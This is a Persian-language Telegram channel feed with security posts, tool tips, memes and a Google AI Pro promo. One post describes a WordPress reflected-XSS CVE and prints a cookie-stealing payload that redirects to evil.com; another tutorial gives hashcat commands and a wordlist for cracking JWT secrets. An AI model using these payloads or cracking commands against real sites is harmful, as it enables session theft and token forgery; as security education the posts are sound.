/dev/null
321 subscribers
50 photos
11 videos
8 files
111 links
| دستمو گذاشتم رو این کار ، قلبمو گذاشتم. |

هر new ای را delete ای ست و پس از آن null کردنی (:
Download Telegram
CVE-2025-46234:
آسیب پذیری Reflected XSS در افزونه وردپرس Razib Control Listings. مهاجم با لینک مخرب ، مثل

example.com/listings?query=<script>alert('Hacked')</script>

کد جاوااسکریپت اجرا می‌کنه و می‌تونه کوکی بدزده و ...


http://example.com/listings?query=<script>document.location='http://evil.com/steal?cookie='+document.cookie</script>
/dev/null
GIF
آقا عجب چیز حقی داره میشه
👍91
🖤
💔10
Forwarded from Linuxor ?
ابزار Watt Admin هم جالبه باهاش می‌تونین سرویس های Node.js رو گرافیکی مانیتور کنید

blog.platformatic.dev/introducing-watt-admin


@Linuxor
Forwarded from Proxy Bar
CVE-2025-1094
*
RCE SQL Injection in PostgreSQL 14.15
*
exploit
🔥5
Forwarded from Linuxor ?
با کلاینت beekeeper studio می‌تونید دیتابیس های خودتون رو مدیریت کنید، اکثر دیتابیس هارو ساپورت می‌کنه توی ورژن های بعدی هم قراره Redis و Snowflake رو ساپورت کنه :

github.com/beekeeper-studio/beekeeper-studio

@Linuxor
Forwarded from Hack Hive
🎯 کرک سیکرت توکن‌های JWT با استفاده از hashcat

🔐 توکن JWT یا JSON Web Token یک استاندارد رایج برای انتقال اطلاعات بین کلاینت و سرور به صورت امن و رمزگذاری شده است.
یک توکن JWT از سه بخش تشکیل می‌شود:
<header>.<payload>.<signature>

امنیت این توکن به کلید مخفی‌‌ای (Secret) که برای تولید امضا استفاده می‌شود وابسته است و در صورتی که سیکرت استفاده شده ضعیف باشد به راحتی توسط ابزار‌هایی مانند hashcat می‌توان آن را کرک کرد.

🔓 ‏ hashcat ابزاری برای کرک کردن و بازیابی پسورد (Password Recovery) می‌باشد. این ابزار امکان حملات مختلف نظیر بروت فورس و دیکشنری را فراهم کرده و همچنین امکان تسریع این پروسه با GPU نیز وجود دارد. این ابزار به دلیل توانایی شکستن انواع الگوریتم‌ها مانند bcrypt، SHA1 و MD5 به یکی ابزار‌های محبوب برای کارشناسان امنیت تبدیل شده است. همچنین قابلیت تنظیم پروفایل‌های مختلف برای سطوح مختلف پردازشی این امکان را فراهم می‌کند تا بتوان بین عملکرد و مصرف منابع تعادل ایجاد کرد.

در JWT عمدتا از الگوریتم HS256 برای رمزنگاری استفاده می‌شود:
{"alg": "HS256", "typ": "JWT"}

این یک نمونه از سربرگ (Header) استفاده شده برای یک توکن JWT می‌باشد.
در بخش پی‌لود نیز مقادیر مورد نیاز درج می‌شود:
{"user": "admin", "name": "John Doe", "isAdmin": True}

در نهایت توکن تولید شده با مقادیر بالا به شکل زیر است:
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiYWRtaW4iLCJuYW1lIjoiSm9obiBEb2UiLCJpc0FkbWluIjp0cnVlfQ.2GIQULwOog_vwCsOjmeVXsRH03AW6E2BpcwOGXiaRO8


🔑 نحوه شکستن توکن با hashcat
به دو روش امکان شکستن وجود دارد:
1- بروت فورس مستقیم
2- با استفاده از wordlist یا دیکشنری

در روش اول اگر الگوی استفاده شده برای سیکرت مشخص باشد و صرفا نیاز به بررسی حالت‌های مختلف وجود داشته باشد می‌توان از کامند زیر استفاده کرد:
hashcat -m 16500 -a 3 <jwt> ?d?d?d

در این حالت <jwt> به مسیر فایل دارای توکن اشاره دارد. d? به معنای این است که کاراکتر ست استفاده شده از اعداد باشد و در نهایت hashcat تمام حالت‌های متشکل از سه رقم را بررسی می‌کند.
- پارامتر m- نوع الگوریتم جهت کرک را مشخص می‌کند که در hashcat از کد 16500 برای JWT استفاده می‌شود.
- پارامتر a- نیز برای تعیین نوع حمله استفاده می‌شود که در اینجا عدد 3 به منظور بروت فورس استفاده می‌شود.
کاراکتر ست‌ها و تعداد آن نیز قابل تنظیم است.
برای مثال اگر بدانیم که سیکرت به ترتیب از دو کاراکتر بزرگ و 3 کاراکتر کوچک و 4 رقم استفاده می‌کند پارامتر hashcat به این شکل تعریف می‌شود:

hashcat -m 16500 -a 3 <jwt> ?u?u?l?l?l?d?d?d?

کاراکتر ست‌های قابل استفاده در hashcat به شرح زیر است:
  l | abcdefghijklmnopqrstuvwxyz [a-z]
u | ABCDEFGHIJKLMNOPQRSTUVWXYZ [A-Z]
d | 0123456789 [0-9]
h | 0123456789abcdef [0-9a-f]
H | 0123456789ABCDEF [0-9A-F]
s | !"#$%&'()*+,-./:;<=>?@[\]^_`{|}~
a | ?l?u?d?s
b | 0x00 - 0xff

در روش دوم قابلیت استفاده از دیکشنری یا وردلیست وجود دارد که برای JWT از این وردلیست می‌توانید استفاده کنید:

https://github.com/wallarm/jwt-secrets/blob/master/jwt.secrets.list

برای این نوع حمله:
hashcat -m 16500 -a 0 <jwt> <wordlist>

در این حالت پارامتر a- به میزان 0 تغییر پیدا می‌کند.
همچنین <wordlist> به مسیر فایل دیکشنری اشاره دارد.
👍61
وقتی تو‌ مصاحبه ازت میپرسن ۵ سال دیگه خودت رو کجا میبینی
🤣12🔥1
Forwarded from VPN CLUB
13ماه استفاده رایگان از google AI Pro
دسترسی به ابزارهای پیشرفته Google AI (مثل Gemini Advanced).



امکان اشتراک‌گذاری فضای ذخیره‌سازی با اعضای خانواده.

فضای ذخیره‌سازی ۲ ترابایت (2 TB)

در سرویس‌های Google مثل Google Drive، Gmail، و Google Photos.

فعالسازی پرمیوم google one

فقط با آی پی آمریکا باید وارد بشید
وارد لینک شدید روی Get student offer بزنید

http://one.google.com/join/ai-student
👍5